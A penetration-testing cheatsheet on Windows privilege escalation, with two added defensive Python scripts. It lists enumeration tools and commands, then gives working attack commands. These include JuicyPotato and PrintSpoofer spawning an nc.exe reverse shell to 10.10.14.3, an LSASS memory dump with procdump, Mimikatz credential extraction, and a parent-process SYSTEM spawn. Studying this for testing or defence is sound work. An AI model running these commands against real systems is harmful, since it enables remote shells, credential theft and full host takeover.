Windows

Manual Enumeration Cheatsheet: PayloadAllTheThings

Tool and description

C# project for performing a wide variety of local privilege escalation checks

WinPEAS: a script that searches for possible paths to escalate privileges on Windows hosts. All of the checks are explained here

PowerUp: PowerShell script for finding common Windows privilege escalation vectors that rely on misconfigurations. It can also be used to exploit some of the issues found

C# version of PowerUp

PowerShell script for enumerating privilege escalation vectors, written in PowerShell 2.0

SessionGopher: a PowerShell tool that finds and decrypts saved session information for remote access tools. It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information

Watson: a .NET tool designed to enumerate missing KBs and suggest exploits for privilege escalation vulnerabilities

LaZagne: tool used for retrieving passwords stored on a local machine from web browsers, chat tools, databases, Git, email, memory dumps, PHP, sysadmin tools, wireless network configurations, internal Windows password storage mechanisms, and more

WES-NG: a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported

Sysinternals: we will use several tools from the Sysinternals suite in our enumeration, including AccessChk, PipeList, and PsService

Network info

ipconfig /all
arp -a
route print

Protections (Antivirus, ...)

Windows Defender:

Get-MpComputerStatus

AppLocker

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Test AppLocker policy

Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone

Initial Enumeration

Windows Commands Reference

Running applications

tasklist /svc

Environment Variables

set

Configuration information (OS Version, Patch dates, ...)

systeminfo

Hotfixes for known CVEs

The last restart time is also a rough indicator of when the host was last updated.

Other possible commands instead of systeminfo:

wmic qfe
Get-HotFix | ft -AutoSize

Installed Programs

wmic product get name
Get-WmiObject -Class Win32_Product | select Name, Version

Use LaZagne to check for saved credentials.

Display Network Connections and Listening Ports (with owning PIDs)

netstat -ano

We may find a vulnerable service only accessible to the local host (when logged on to the host) that we can exploit to escalate privileges.

Logged in users

query user

Current User

echo %USERNAME%

Current User Privileges

whoami /priv

Current User Group Information

whoami /groups

Get All Users

net user

Get All Groups

net localgroup

Details about a group

net localgroup administrators

Get Password Policy and Other Account Information

net accounts

Listing Named Pipes

pipelist.exe /accepteula

pipelist is from Sysinternals; alternatively, with PowerShell:

gci \\.\pipe\

Another Sysinternals tool, AccessChk, can show which pipes are writable:

accesschk.exe -w \pipe\* -v
accesschk.exe -accepteula -w \pipe\WindscribeService -v

PrivescCheck Script

Build it with:

powershell -ep bypass -c ". .\build\Build.ps1; Invoke-Build"

Remember the dot sourcing!

Dangerous Permissions

SeNetworkLogonRight

Administrators, Authenticated Users

Determines which users can connect to the device from the network. This is required by network protocols such as SMB, NetBIOS, CIFS, and COM+.

SeRemoteInteractiveLogonRight

Administrators, Remote Desktop Users

This policy setting determines which users or groups can access the login screen of a remote device through a Remote Desktop Services connection. A user can establish a Remote Desktop Services connection to a particular server but not be able to log on to the console of that same server.

SeBackupPrivilege

Administrators

This user right determines which users can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system.

SeSecurityPrivilege

Administrators

This policy setting determines which users can specify object access audit options for individual resources such as files, Active Directory objects, and registry keys. These objects specify their system access control lists (SACL). A user assigned this user right can also view and clear the Security log in Event Viewer.

SeTakeOwnershipPrivilege

Administrators

This policy setting determines which users can take ownership of any securable object in the device, including Active Directory objects, NTFS files and folders, printers, registry keys, services, processes, and threads.

SeDebugPrivilege

Administrators

This policy setting determines which users can attach to or open any process, even a process they do not own. Developers who are debugging their applications do not need this user right. Developers who are debugging new system components need this user right. This user right provides access to sensitive and critical operating system components.

SeImpersonatePrivilege

Administrators, Local Service, Network Service, Service

This policy setting determines which programs are allowed to impersonate a user or another specified account and act on behalf of the user.

SeLoadDriverPrivilege

Administrators

This policy setting determines which users can dynamically load and unload device drivers. This user right is not required if a signed driver for the new hardware already exists in the driver.cab file on the device. Device drivers run as highly privileged code.

SeRestorePrivilege

Administrators

This security setting determines which users can bypass file, directory, registry, and other persistent object permissions when they restore backed up files and directories. It determines which users can set valid security principals as the owner of an object.

Further information can be found here.
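As an added check (not part of the original notes): the script below parses saved whoami /priv output and reports which of the privileges listed above the token holds, Disabled ones included, since a disabled privilege is still held and can be enabled by the user's own processes. Note that logon rights such as SeNetworkLogonRight and SeRemoteInteractiveLogonRight are policy assignments and never appear in whoami /priv, so they are out of scope here; the sample output is constructed.

```python
import re
from typing import Dict, List, Tuple

# Privileges the notes above single out as dangerous when held by a low-privileged
# account (SeAssignPrimaryTokenPrivilege is named in the JuicyPotato section).
DANGEROUS_PRIVILEGES = {
    "SeBackupPrivilege", "SeSecurityPrivilege", "SeTakeOwnershipPrivilege",
    "SeDebugPrivilege", "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege",
    "SeLoadDriverPrivilege", "SeRestorePrivilege",
}

# whoami /priv prints fixed-width columns: name, free-text description, state.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(output: str) -> Dict[str, str]:
    """Map privilege name -> state ('Enabled'/'Disabled') from whoami /priv text.
    Header, separator and blank lines do not match the pattern and are skipped."""
    privs: Dict[str, str] = {}
    for line in output.splitlines():
        match = PRIV_LINE.match(line.strip())
        if match:
            privs[match.group(1)] = match.group(3)
    return privs


def flag_dangerous(privs: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return the held privileges that are on the watch list, with their state.
    'Disabled' is reported too: the token still holds the privilege and any
    process of that user can switch it on with AdjustTokenPrivileges."""
    return sorted((n, s) for n, s in privs.items() if n in DANGEROUS_PRIVILEGES)


# Constructed sample laid out like real whoami /priv output (not a captured one).
SAMPLE_OUTPUT = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeDebugPrivilege              Debug programs                            Disabled
"""

if __name__ == "__main__":
    for name, state in flag_dangerous(parse_whoami_priv(SAMPLE_OUTPUT)):
        print(f"{name}: {state}")
```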

SeImpersonate or SeAssignPrimaryToken

JuicyPotato can be used to exploit the SeImpersonate or SeAssignPrimaryToken privileges via DCOM/NTLM reflection abuse.

Example of JuicyPotato from a MSSQL shell:

xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

-l is the COM server listening port, -p is the program to launch (cmd.exe), -a is the argument passed to cmd.exe, and -t is the CreateProcess call to use. With -t * we are telling the tool to try both the CreateProcessWithTokenW and CreateProcessAsUser functions, which need SeImpersonate or SeAssignPrimaryToken privileges respectively.

JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. However, PrintSpoofer and RoguePotato can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access. This blog post goes in-depth on the PrintSpoofer tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.

Example using PrintSpoofer from a MSSQL shell:

xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

Both examples above require xp_cmdshell to be enabled. Impacket's MSSQL tool does this by simply running the command enable_xp_cmdshell.

SeDebugPrivilege

We can use ProcDump from the SysInternals suite to leverage this privilege and dump process memory. A good candidate is the Local Security Authority Subsystem Service (LSASS) process, which stores user credentials after a user logs on to a system.

procdump.exe -accepteula -ma lsass.exe lsass.dmp

We can load this dump in Mimikatz using the sekurlsa::minidump command. After issuing the sekurlsa::logonPasswords command, we obtain the NTLM hash of the local administrator account logged on locally.

Suppose we are unable to load tools on the target for whatever reason but have RDP access. In that case, we can take a manual memory dump of the LSASS process via the Task Manager by browsing to the Details tab, choosing the LSASS process, and selecting Create dump file.

Mimikatz commands:

log
sekurlsa::minidump file.dmp
sekurlsa::logonpasswords
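As an added defensive counterpart to the LSASS dump described above (not part of the original notes): both procdump and the Task Manager "Create dump file" route must open lsass.exe with at least PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, which Sysmon records as Event ID 10 (ProcessAccess). The function below flags such events from records already parsed into dicts with the SourceImage, TargetImage and GrantedAccess fields; the allow-list of expected readers and the sample events are constructed for this example.

```python
from typing import Dict, List

# Process access-right bits (Win32 ProcessAccessRights).
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
# Minimum MiniDumpWriteDump needs on the target process.
MINIDUMP_ACCESS = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION  # 0x0410

# Assumption: images that legitimately read LSASS memory in this environment.
# Tune per estate; an empty tuple flags every reader of LSASS memory.
EXPECTED_READERS = (
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\csrss.exe",
)


def is_lsass_dump_candidate(event: Dict[str, str]) -> bool:
    """True for a Sysmon Event ID 10 record in which an unexpected source
    process opened lsass.exe with the rights a minidump requires."""
    if event.get("EventID") != "10":
        return False
    if not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    if granted & MINIDUMP_ACCESS != MINIDUMP_ACCESS:
        return False  # e.g. PROCESS_QUERY_LIMITED_INFORMATION (0x1000) alone
    return event.get("SourceImage", "").lower() not in EXPECTED_READERS


def find_lsass_dumps(events: List[Dict[str, str]]) -> List[str]:
    """Source images that should be investigated, in event order."""
    return [e["SourceImage"] for e in events if is_lsass_dump_candidate(e)]


# Constructed sample records (not real telemetry), only the fields used above.
LSASS = r"C:\Windows\System32\lsass.exe"
SAMPLE_EVENTS = [
    {"EventID": "10", "SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    {"EventID": "10", "SourceImage": r"C:\tools\procdump.exe", "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    {"EventID": "10", "SourceImage": r"C:\Windows\System32\Taskmgr.exe", "TargetImage": LSASS, "GrantedAccess": "0x1410"},
    {"EventID": "10", "SourceImage": r"C:\Program Files\app\app.exe", "TargetImage": LSASS, "GrantedAccess": "0x1000"},
    {"EventID": "10", "SourceImage": r"C:\tools\procdump.exe", "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1FFFFF"},
]

if __name__ == "__main__":
    for image in find_lsass_dumps(SAMPLE_EVENTS):
        print("LSASS memory read by unexpected process:", image)
```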

Transfer the psgetsys.ps1 PoC script over to the target system. Next, we dot-source the script and run it with the following syntax: [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,""). Note that we must add a third blank argument "" at the end for the PoC to work properly.

. .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(612,"C:\Windows\System32\cmd.exe", "")

The PoC script has received an update. Please visit its GitHub repository and review its usage. https://github.com/decoder-it/psgetsystem

First, open an elevated PowerShell console (right-click, run as admin, and type in the credentials for the jordan user). Next, type tasklist to get a listing of running processes and accompanying PIDs.

SeTakeOwnershipPrivilege

SeTakeOwnershipPrivilege grants a user the ability to take ownership of any "securable object", meaning Active Directory objects, NTFS files/folders, printers, registry keys, services, and processes.

Abusing this privilege is a bit of an edge case. Still, it is worth understanding in-depth, especially since we may also find ourselves in a scenario in an Active Directory environment where we can assign this right to a specific user that we can control and leverage it to read a sensitive file on a file share.
